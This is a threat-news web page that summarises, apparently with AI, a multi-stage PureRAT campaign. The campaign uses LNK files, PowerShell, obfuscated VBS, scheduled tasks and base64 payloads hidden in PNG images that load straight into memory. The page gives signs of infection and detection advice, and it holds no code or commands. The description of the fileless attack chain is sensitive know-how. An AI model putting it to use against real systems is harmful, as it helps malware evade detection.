CP
cyberpings

Multi-stage PureRAT Campaign - Fileless Execution Using PNGs

A new malware campaign is using PNG images for fileless execution of PureRAT. Organizations must be alert to suspicious PowerShell activities and Task Scheduler jobs. This evolving threat highlights the importance of robust cybersecurity measures.

Malware & RansomwareHIGHUpdated: Published:
Featured image for Multi-stage PureRAT Campaign - Fileless Execution Using PNGs

Original Reporting

SCSC Media

AI Summary

CyberPings AI·Reviewed by Rohit Rana

🎯Basically, hackers are using image files to secretly run malware without leaving traces.

What Happened

A recent report by GBHackers News reveals a sophisticated multi-stage PureRAT campaign that utilizes ordinary PNG images to execute malware without traditional file storage. This method is part of a broader trend in cyberattacks, where attackers aim to evade detection by using seemingly harmless files.

How It Works

The attack begins with a malicious LNK file that triggers a concealed PowerShell command. This command downloads a heavily obfuscated VBS file, designed to bypass security measures. Once executed, the VBS file copies itself and sets up a Task Scheduler job for persistence, ensuring the malware remains active even after a system reboot.

The PowerShell loader then establishes connections to hardcoded domains to fetch a PNG file containing a base64-encoded portable executable (PE) payload. Another PNG file is also downloaded, the contents of which are decoded and loaded directly into memory. This technique is particularly insidious as it avoids writing malicious files to disk, making detection more challenging.

Who's Being Targeted

This campaign appears to target organizations across various sectors, particularly those that may not have robust security measures in place. The use of fileless execution techniques suggests that the attackers are aiming for environments where traditional detection methods may fail.

Signs of Infection

Organizations should be on the lookout for:

🔴

Suspicious LNK-initiated PowerShell activity

🟡

cmstp.exe

(a Windows component often exploited by attackers)

🟠

Task Scheduler

jobs that seem out of place

How to Protect Yourself

To defend against this evolving threat, security teams should:

Detection

  • 1.Monitor PowerShell execution logs for unusual commands
  • 2.Implement strict controls on the use of LNK files and PowerShell scripts

Conclusion

The PureRAT campaign exemplifies the need for organizations to enhance their cybersecurity posture. By leveraging fileless techniques and common file types like PNGs, attackers are becoming increasingly sophisticated. Vigilance and proactive measures are essential to protect against such threats.

🔒 Pro Insight

🔒 Pro insight: The use of fileless techniques in this PureRAT campaign indicates a shift towards stealthier attack vectors, requiring enhanced detection capabilities.

SCSC Media
Read Original

Share

Related Pings

Preview image for Malicious pgserve & automagik Tools Found in npm Registry
Malware & Ransomware
HIGH

Malicious pgserve & automagik Tools Found in npm Registry

Malicious versions of pgserve and automagik have been found in the npm registry, posing serious risks to developers. These tools can steal sensitive data and credentials. Immediate action is required to secure your systems.

CSCSO Online
Read PingRead Source
Preview image for Everest Ransomware - Major Breaches at Citizens and Frost Bank
Malware & Ransomware
HIGH

Everest Ransomware - Major Breaches at Citizens and Frost Bank

Major breaches at Citizens Financial Group and Frost Bank have been linked to Everest ransomware, exposing millions of customer records. Customers should take immediate action to protect their data.

SCSC Media
Read PingRead Source
Preview image for Fake GitHub Repositories - Delivering SmartLoader and StealC
Malware & Ransomware
HIGH

Fake GitHub Repositories - Delivering SmartLoader and StealC

A large-scale malware campaign has been uncovered involving 109 fake GitHub repositories. Users were tricked into downloading SmartLoader and StealC malware. This poses serious risks for developers and security professionals alike. Immediate protective measures are essential.

CSCyber Security News
Read PingRead Source
Preview image for Auraboros RAT - Exposes Keylogging and Cookie Hijacking
Malware & Ransomware
HIGH

Auraboros RAT - Exposes Keylogging and Cookie Hijacking

A new RAT called Auraboros exposes serious vulnerabilities, including keylogging and cookie hijacking. This malware operates without any security measures, putting users at risk. Immediate action is needed to secure systems against this threat.

CSCyber Security News
Read PingRead Source
Preview image for DinDoor Backdoor - Abusing Deno Runtime for Stealthy Attacks
Malware & Ransomware
HIGH

DinDoor Backdoor - Abusing Deno Runtime for Stealthy Attacks

DinDoor backdoor exploits Deno runtime to bypass security. This stealthy malware targets systems, making detection difficult. Organizations must enhance monitoring and controls.

CSCyber Security News
Read PingRead Source
Preview image for Malicious Trading Website Drops Browser Hijacking Malware
Malware & Ransomware
HIGH

Malicious Trading Website Drops Browser Hijacking Malware

A fake TradingClaw AI trading tool leads to Needle Stealer malware, hijacking browsers and stealing sensitive data. Protect your accounts now.

MWMalwarebytes Labs
Read PingRead Source